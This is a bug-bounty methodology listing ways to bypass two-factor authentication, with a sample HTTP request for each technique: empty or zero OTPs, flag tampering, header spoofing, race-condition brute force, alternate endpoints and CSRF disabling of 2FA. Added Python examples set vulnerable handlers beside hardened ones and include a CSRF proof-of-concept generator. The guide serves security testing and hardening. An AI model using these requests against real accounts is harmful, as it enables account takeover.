Two Factor Authentication

The document outlines various methods an attacker could try to bypass two-factor authentication (2FA) on a website, including: 1. Sending an empty or fixed value for the one-time password (OTP) parameter. 2. Manipulating request parameters like changing the 2FA enabled flag to false. 3. Appending extra headers or modifying the request to bypass 2FA checks. 4. Attempting to exploit vulnerabilities in the 2FA implementation through techniques like bruteforcing, race conditions or leveraging other accounts.


2 Factor Authentication
Enter 6-Digit Code

Mahmoud M. Awali
@0xAwali

My Methodology

Try sending an empty OTP or a null value, e.g. "otp":"" or otp=null, to bypass 2FA. A server that treats "no code supplied" as "nothing to verify" grants the session.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":""}

Try inserting zeros in the OTP parameter, e.g. 000000, to bypass 2FA. One root cause is a stored code that is empty or already cleared and compared numerically, so 000000 equals 0.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"000000"}

Always compare the requests sent when 2FA is enabled and when it is disabled. If there is a boolean that is true when 2FA is enabled, try changing it to false to bypass 2FA; whether 2FA applies must come from the account record, never from the client.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","2fa":false,"otp":"****"}

Enable 2FA, then try to log in with the OTP parameter removed entirely. Sometimes enabling 2FA has no effect and the second factor is simply not enforced.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****"}

Try appending an X-Forwarded-For header, e.g. X-Forwarded-For: 127.0.0.1, to bypass 2FA. This works when the application exempts trusted or internal addresses from 2FA and takes the client address from the header without validating it.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
X-Forwarded-For: 127.0.0.1
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"*****"}
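The following is an added example, not part of the original slides or the author's tooling: a constructed Python model of a /secondLogin handler that falls to the empty/null OTP, 000000, 2FA-flag, missing-OTP and X-Forwarded-For probes above, beside a hardened handler that does not. The account table, the TRUSTED_IPS exemption, the pending-code field and the probe names are assumptions made for the example.

```python
"""Constructed simulation of the /secondLogin handler: a vulnerable version
that accepts the tampered requests from the empty/null OTP, 000000, 2FA-flag,
missing-OTP and X-Forwarded-For slides, beside a hardened version.
Example code, not the page's or any product's code; the account table, the
TRUSTED_IPS rule and the field names are assumptions."""
import hmac
import json

# Constructed accounts. "me" has 2FA on but no code pending (never issued or
# already consumed); "alice" has 2FA on with code 482913 pending.
USERS = {
    "me": {"pass": "****", "mfa_enabled": True, "current_otp": None},
    "alice": {"pass": "****", "mfa_enabled": True, "current_otp": "482913"},
}
TRUSTED_IPS = {"127.0.0.1"}  # assumption: the app exempts "internal" clients


def vulnerable_second_login(headers: dict, raw_body: str) -> bool:
    """Returns True when a full session would be granted."""
    body = json.loads(raw_body)
    user = USERS.get(body.get("email"))
    if user is None or body.get("pass") != user["pass"]:
        return False
    # Bug 1: the client's "2fa" field overrides the account setting.
    if not body.get("2fa", user["mfa_enabled"]):
        return True
    # Bug 2: a client-controlled header decides the "trusted address" exemption.
    if headers.get("X-Forwarded-For") in TRUSTED_IPS:
        return True
    otp = body.get("otp")
    # Bug 3: missing, empty and null OTP all mean "nothing to verify".
    if not otp:
        return True
    # Bug 4: numeric comparison against a cleared code, so "000000" matches 0.
    return int(otp) == int(user["current_otp"] or 0)


def hardened_second_login(headers: dict, raw_body: str) -> bool:
    """Policy comes from the account record only; headers and extra body
    fields are ignored, the OTP must be a 6-digit string and a code must
    actually be pending for this account."""
    body = json.loads(raw_body)
    user = USERS.get(body.get("email"))
    if user is None or not hmac.compare_digest(str(body.get("pass", "")), user["pass"]):
        return False
    if not user["mfa_enabled"]:
        return True
    otp = body.get("otp")
    pending = user["current_otp"]
    if pending is None or not isinstance(otp, str) or len(otp) != 6 or not otp.isdigit():
        return False
    return hmac.compare_digest(otp, pending)


# The probes from the slides, as (headers, JSON body) pairs.
BASE = {"email": "me", "pass": "****"}
PROBES = {
    "empty_otp": ({}, {**BASE, "otp": ""}),
    "null_otp": ({}, {**BASE, "otp": None}),
    "zeros_otp": ({}, {**BASE, "otp": "000000"}),
    "missing_otp": ({}, BASE),
    "flag_false": ({}, {**BASE, "2fa": False, "otp": "111111"}),
    "xff_localhost": ({"X-Forwarded-For": "127.0.0.1"}, {**BASE, "otp": "111111"}),
}


def run_probes(handler) -> dict:
    """Map probe name -> whether the handler let it through."""
    return {name: handler(h, json.dumps(b)) for name, (h, b) in PROBES.items()}


def legit_login(handler) -> bool:
    """The honest path: alice with her pending code."""
    return handler({}, json.dumps({"email": "alice", "pass": "****", "otp": "482913"}))


if __name__ == "__main__":
    for name, h in (("vulnerable", vulnerable_second_login), ("hardened", hardened_second_login)):
        print(name, run_probes(h), "legit:", legit_login(h))
```

The pattern to take from it: the server derives the 2FA requirement from the account record, ignores any client-supplied flag or address header, and rejects anything that is not a pending 6-digit string, so "nothing supplied" can never mean "nothing to check".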

Try to find out whether an old OTP is still valid or the OTP is fixed. If so, there is an issue: a code must be single-use, must expire, and must change on every issue.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"Old-OTP"}

Try brute-forcing the OTP to bypass 2FA (FUZZ marks the fuzzed position). A 6-digit code has only 1,000,000 values, so without a per-account attempt limit this is feasible.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"FUZZ"}

If the OTP is rate limited, try brute-forcing it with the race condition technique (many requests in flight at once) or the IP Rotate Burp Suite extension (when the limit is keyed by client IP).

POST /resetPassword HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=me&pass=*****&otp=*****
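Added example for the two brute-force slides above, not code from the original deck: a constructed Python model of the per-account attempt limiter that the race technique defeats. The vulnerable limiter is written as read, compare, write, the way it appears in many code bases; a threading.Barrier makes every simulated request read the counter before any of them writes it, which is exactly the window the attack relies on. Class names, MAX_ATTEMPTS and the account name are assumptions.

```python
"""Constructed model of the race-condition brute force: a per-account OTP
attempt limiter written as read, compare, write versus one that increments
atomically. Threads stand in for the parallel requests Burp's race tooling
sends; a Barrier forces every thread to read the counter before any writes.
Example code, not the page's code; names and limits are assumptions."""
import threading

MAX_ATTEMPTS = 5  # per account, per OTP; 6 digits = 1,000,000 possible codes


class VulnerableLimiter:
    """Check-then-increment with no synchronisation."""

    def __init__(self):
        self.attempts = {}

    def try_otp(self, account: str, otp: str, barrier=None) -> str:
        count = self.attempts.get(account, 0)          # 1. read
        if barrier is not None:
            barrier.wait()                              # (all requests in flight)
        if count >= MAX_ATTEMPTS:                       # 2. compare
            return "locked"
        self.attempts[account] = count + 1              # 3. write (lost updates)
        return "checked"                                # OTP would be compared here


class HardenedLimiter:
    """Increment-then-check under a lock: the same shape as one atomic
    'UPDATE ... SET attempts = attempts + 1 WHERE account = ?' in the database."""

    def __init__(self):
        self.attempts = {}
        self.lock = threading.Lock()

    def try_otp(self, account: str, otp: str, barrier=None) -> str:
        with self.lock:
            count = self.attempts.get(account, 0) + 1
            self.attempts[account] = count
        if barrier is not None:
            barrier.wait()
        if count > MAX_ATTEMPTS:
            return "locked"
        return "checked"


def sequential(limiter, guesses: int = 20, account: str = "victim@example.com") -> int:
    """Guesses one after another, as a scanner or a naive test would send them."""
    return sum(limiter.try_otp(account, f"{i:06d}") == "checked" for i in range(guesses))


def race(limiter, parallel: int = 20, account: str = "victim@example.com") -> int:
    """All guesses in flight at once; returns how many got past the limiter."""
    barrier = threading.Barrier(parallel)
    results, results_lock = [], threading.Lock()

    def worker(i: int):
        outcome = limiter.try_otp(account, f"{i:06d}", barrier)
        with results_lock:
            results.append(outcome)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(parallel)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results.count("checked")


if __name__ == "__main__":
    print("vulnerable sequential:", sequential(VulnerableLimiter()))   # 5
    print("vulnerable race:      ", race(VulnerableLimiter()))         # 20
    print("hardened race:        ", race(HardenedLimiter()))           # 5
```

Both limiters look identical under sequential testing, which is why the race has to be tried explicitly. The IP Rotate extension targets a different defect, a limit keyed only by client address; the fix for both is a counter keyed by account (and by the OTP instance) that is incremented atomically before the comparison and that invalidates the code once the limit is reached.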

Enter a wrong OTP code, then try manipulating the response to match the response returned for a correct OTP code, to bypass 2FA. This only succeeds when the client decides what happens next from the response body; if the server issues the session token only after a correct code and checks it on later requests, a forged response changes nothing.

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{
"code" : "correct otp",
"token" : "Random String"
}

Try logging in with OAuth. If 2FA is requested when logging in with email and password, the OAuth flow may skip it.

Steps to reproduce:

1 - Log in with a valid email and password
2 - You will be asked for the OTP
3 - Try to log in with OAuth instead
4 - You get access to your account without 2FA

Try using the OTP of another account, e.g. your second account, to bypass 2FA. A code that is not bound to the account it was issued for is accepted for anyone.

POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"Your-OTP"}
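Added example, not from the original slides, covering this slide and the earlier "old OTP / fixed OTP" slide together: a constructed Python OTP store with all three defects (codes never consumed, derived from static account data so they never change, and kept in one global table so any account's code works for any other), beside a store that binds one fresh random code to one account, expires it and consumes it on first use. Class names, the 300-second TTL and the fake clock passed as `now` are assumptions.

```python
"""Constructed OTP store showing the defects behind the 'old OTP still valid',
'OTP is fixed' and 'OTP of another account' slides, beside a store that closes
them. Example code, not the page's code; class names, TTL_SECONDS and the
integer fake clock passed as `now` are assumptions."""
import hashlib
import hmac
import secrets

TTL_SECONDS = 300


class WeakOtpStore:
    """One global set of live codes: nothing expires, nothing is consumed,
    and the code is derived from static account data so it never changes."""

    def __init__(self):
        self.live = set()

    def issue(self, user: str, now: int) -> str:
        digest = hashlib.sha256(user.encode()).hexdigest()
        code = f"{int(digest, 16) % 10**6:06d}"      # same code for this user every time
        self.live.add(code)
        return code

    def verify(self, user: str, code, now: int) -> bool:
        return code in self.live                       # user ignored, no expiry, no single use


class HardenedOtpStore:
    """pending: user -> (code, issued_at); one code per account at a time."""

    def __init__(self):
        self.pending = {}

    def issue(self, user: str, now: int) -> str:
        code = f"{secrets.randbelow(10**6):06d}"      # CSPRNG, replaces any earlier code
        self.pending[user] = (code, now)
        return code

    def verify(self, user: str, code, now: int) -> bool:
        entry = self.pending.get(user)
        well_formed = isinstance(code, str) and len(code) == 6 and code.isascii() and code.isdigit()
        if entry is None or not well_formed:
            return False
        stored, issued_at = entry
        if now - issued_at > TTL_SECONDS:
            del self.pending[user]                     # expired: force a fresh issue
            return False
        ok = hmac.compare_digest(stored, code)
        if ok:
            del self.pending[user]                     # single use
        return ok


def run_probes(store, t0: int = 1_700_000_000) -> dict:
    """Each entry is True when the store has that weakness."""
    victim, attacker = "victim@example.com", "attacker@example.com"
    findings = {}
    code = store.issue(victim, t0)
    store.verify(victim, code, t0 + 5)                              # legitimate use
    findings["old_otp_still_valid"] = store.verify(victim, code, t0 + 10)
    findings["otp_is_fixed"] = store.issue(victim, t0) == store.issue(victim, t0 + 1)
    store.issue(victim, t0)                                         # victim has a code pending
    mine = store.issue(attacker, t0)                                # attacker's own account
    findings["other_accounts_otp_accepted"] = store.verify(victim, mine, t0 + 5)
    code = store.issue(victim, t0)
    findings["expired_otp_accepted"] = store.verify(victim, code, t0 + TTL_SECONDS + 1)
    return findings


def legit(store, t0: int = 1_700_000_000) -> bool:
    """The honest path: fresh code, verified within the TTL."""
    code = store.issue("victim@example.com", t0)
    return store.verify("victim@example.com", code, t0 + 30)


if __name__ == "__main__":
    print("weak:    ", run_probes(WeakOtpStore()))
    print("hardened:", run_probes(HardenedOtpStore()))
```

When testing, the four probes map directly onto requests: replay a consumed code, request two codes and compare them, submit a code issued to your second account, and submit a code after waiting past the advertised validity.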

Try disabling 2FA with CSRF: disable 2FA in account one, then replay that request against account two through a CSRF PoC. A JSON body on its own does not prevent this; the endpoint needs an anti-CSRF token or Origin check, and it should require the current password or OTP before turning 2FA off.

POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"action":"disable_2fa"}
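Added example for the CSRF slide above, not code from the original deck: a constructed Python model of what a browser sends from a cross-site form with enctype=text/plain, why a /setting handler that only checks the session cookie accepts it as JSON, and the checks that reject it. The session table, the header names, the csrf_token field, the evil.example origin and the step-up OTP requirement are assumptions.

```python
"""Constructed example for the disable-2FA CSRF slide: the request a browser
sends from a cross-site text/plain form, a vulnerable /setting handler that
accepts it, and a hardened one that does not. Not the page's code; the session
table, header names, csrf_token field and step-up OTP are assumptions."""
import hmac
import json

SESSIONS = {"sid=abc123": {"user": "victim", "csrf_token": "t0k3n"}}
ALLOWED_ORIGINS = {"https://www.company.com"}
CURRENT_OTP = "482913"  # assumption: the victim's currently valid code


def text_plain_form_body(fields: dict) -> str:
    """Body a browser builds for <form enctype="text/plain">: name=value per line."""
    return "\r\n".join(f"{name}={value}" for name, value in fields.items())


def csrf_poc_fields() -> dict:
    """The JSON is split over the field name and value so that the '=' the
    browser inserts ends up inside a throwaway key."""
    return {'{"action":"disable_2fa","pad":"': '"}'}


def csrf_poc_html(target: str) -> str:
    """Auto-submitting PoC page an attacker would host."""
    (name, value), = csrf_poc_fields().items()
    return (f'<form method="POST" action="{target}" enctype="text/plain">'
            f"<input name='{name}' value='{value}'></form>"
            "<script>document.forms[0].submit()</script>")


def cross_site_request() -> dict:
    """What arrives at /setting when the victim loads the PoC. The cookie is
    attached only if SameSite allows it (SameSite=None, or a browser that
    still sends cookies on cross-site POSTs)."""
    return {"headers": {"Origin": "https://evil.example", "Content-Type": "text/plain",
                        "Cookie": "sid=abc123"},
            "body": text_plain_form_body(csrf_poc_fields())}


def legitimate_request() -> dict:
    return {"headers": {"Origin": "https://www.company.com",
                        "Content-Type": "application/json", "Cookie": "sid=abc123"},
            "body": json.dumps({"action": "disable_2fa", "csrf_token": "t0k3n",
                                "otp": CURRENT_OTP})}


def vulnerable_setting(req: dict) -> bool:
    """Accepts any body that parses as JSON, from any origin, with a valid cookie."""
    if req["headers"].get("Cookie") not in SESSIONS:
        return False
    data = json.loads(req["body"])
    return data.get("action") == "disable_2fa"   # True: 2FA would be turned off


def hardened_setting(req: dict) -> bool:
    h = req["headers"]
    session = SESSIONS.get(h.get("Cookie"))
    if session is None:
        return False
    if h.get("Origin") not in ALLOWED_ORIGINS:                          # origin check
        return False
    if h.get("Content-Type", "").split(";")[0].strip() != "application/json":
        return False                                                    # forms cannot send this
    data = json.loads(req["body"])
    if not hmac.compare_digest(str(data.get("csrf_token", "")), session["csrf_token"]):
        return False                                                    # per-session token
    if data.get("action") != "disable_2fa":
        return False
    # Step-up: turning the second factor off re-proves the second factor.
    return hmac.compare_digest(str(data.get("otp", "")), CURRENT_OTP)


if __name__ == "__main__":
    print(csrf_poc_html("https://www.company.com/setting"))
    print("vulnerable accepts PoC:", vulnerable_setting(cross_site_request()))
    print("hardened accepts PoC:  ", hardened_setting(cross_site_request()))
```

Any one of the three hardened checks blocks the PoC; the step-up OTP is there because a disable-2FA request that slips through by some other route (a leaked session, an XSS) should still not be enough on its own. Check the session cookie's SameSite attribute as well: with SameSite=Lax or Strict the browser will not attach it to this POST and the PoC fails before reaching the handler.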

If sign-up does not verify the email address, try signing up with the victim's email, log in with that email and password, then enable 2FA.

POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"action":"enable_2fa"}

Try to find other endpoints that perform the same action without requiring 2FA, e.g. API endpoints, to bypass 2FA.

POST /apiLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****"}

If there is an endpoint that generates backup codes, try POSTing to it directly, e.g. POST /generateBackup, after entering the email and password but before completing the OTP step.

Steps to reproduce:

1 - Log in with a valid email and password
2 - Provide a wrong OTP code
3 - Capture the request with Burp Suite
4 - Change the request to POST /generateBackup HTTP/1.1
5 - Change the body to {"action":"backup_codes"}

Try using a SOAP endpoint to bypass 2FA: if an endpoint accepts SOAP, send a SOAP body with a valid email and password and no OTP code.

POST /secondLogin HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<email>me</email>
<pass>*******</pass>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Try signing up and reusing the email confirmation link several times if it does not expire, to bypass 2FA.

Steps to reproduce:

1 - Sign up with an email address
2 - Click the confirmation link
3 - Enable 2FA
4 - After 24 hours, click the confirmation link again
5 - Check whether 2FA is enforced or not
Credit: Hack3rScr0lls (tweet) #BugBounty #BugBountyTip
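Added example, not code from the original deck, covering the OAuth, API-endpoint, backup-code and SOAP slides together (the confirmation-link slide is the same class of bug: the link must count as a first factor at most, and be single-use). The constructed Python model shows why these endpoints exist: when each handler decides for itself whether 2FA was completed, every new way of proving the first factor is a new way to skip the second. The hardened version keeps one authentication level per session and has the router enforce the full level on every route by default. The session layout, the Level names and the /oauthCallback route are assumptions.

```python
"""Constructed model for the alternate-endpoint slides (/apiLogin, the SOAP
login, /generateBackup, OAuth): when each handler decides for itself whether
2FA is complete, every new way to prove the first factor skips the second.
The hardened router keeps one authentication level per session and demands
the full level on every route by default. Example code, not the page's code."""
import hmac
from enum import IntEnum

USERS = {"me": {"pass": "****", "mfa_enabled": True, "otp": "482913"}}

def password_ok(body):
    user = USERS.get(body.get("email"))
    return user is not None and hmac.compare_digest(str(body.get("pass", "")), user["pass"])

def otp_ok(s, body):
    return bool(s.get("user")) and hmac.compare_digest(str(body.get("otp", "")), USERS[s["user"]]["otp"])

# ---- vulnerable: every handler checks on its own --------------------------
def v_login(s, body):
    if not password_ok(body):
        return False
    s["user"], s["otp_pending"] = body["email"], USERS[body["email"]]["mfa_enabled"]
    return True

def v_api_login(s, body):               # added later; nobody set otp_pending
    if not password_ok(body):
        return False
    s["user"] = body["email"]
    return True

def v_oauth_callback(s, body):          # provider asserted the identity, no OTP step
    s["user"] = body["email"]
    return True

def v_second_login(s, body):
    if otp_ok(s, body):
        s["otp_pending"] = False
        return True
    return False

def v_generate_backup(s, body):         # checks "logged in", not "2FA completed"
    return s.get("user") is not None

VULNERABLE = {"/login": v_login, "/apiLogin": v_api_login, "/oauthCallback": v_oauth_callback,
              "/secondLogin": v_second_login, "/generateBackup": v_generate_backup}
call_vulnerable = lambda s, path, body: VULNERABLE[path](s, body)

# ---- hardened: one level per session, enforced by the router --------------
class Level(IntEnum):
    ANON = 0
    PASSWORD = 1    # first factor proven, OTP outstanding
    MFA = 2         # both factors proven

def first_factor(s, email):             # every first-factor entry lands in the same state
    s["user"] = email
    s["level"] = Level.PASSWORD if USERS[email]["mfa_enabled"] else Level.MFA

def h_login(s, body):                   # serves /login and /apiLogin alike
    if not password_ok(body):
        return False
    first_factor(s, body["email"])
    return True

def h_oauth_callback(s, body):          # provider-asserted identity is still only factor one
    first_factor(s, body["email"])
    return True

def h_second_login(s, body):
    if otp_ok(s, body):
        s["level"] = Level.MFA
        return True
    return False

HARDENED = {"/login": h_login, "/apiLogin": h_login, "/oauthCallback": h_oauth_callback,
            "/secondLogin": h_second_login, "/generateBackup": lambda s, b: True}
REQUIRED = {"/login": Level.ANON, "/apiLogin": Level.ANON, "/oauthCallback": Level.ANON,
            "/secondLogin": Level.PASSWORD}   # any route not listed here needs Level.MFA

def call_hardened(s, path, body):
    if s.get("level", Level.ANON) < REQUIRED.get(path, Level.MFA):
        return False                    # one check, before any handler runs
    return HARDENED[path](s, body)

def probe(call):
    """Can a session that never sent an OTP reach /generateBackup from each entry?"""
    out = {}
    for entry in ("/login", "/apiLogin", "/oauthCallback"):
        s = {}
        call(s, entry, {"email": "me", "pass": "****"})
        out[entry] = call(s, "/generateBackup", {})
    return out

def full_login(call):                   # the honest path still works
    s = {}
    return (call(s, "/login", {"email": "me", "pass": "****"})
            and call(s, "/secondLogin", {"otp": "482913"})
            and call(s, "/generateBackup", {}))
```

The SOAP endpoint from the slide is just another entry in the VULNERABLE table with the same mistake; in the hardened layout it would also call first_factor and nothing else, so the level never reaches MFA without /secondLogin. When testing, enumerate every route that sets a session (web login, API, SOAP, OAuth callback, confirmation link) and every route that acts on one, and try each pair with a password-only session.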
Thank You
Mahmoud M. Awali
@0xAwali
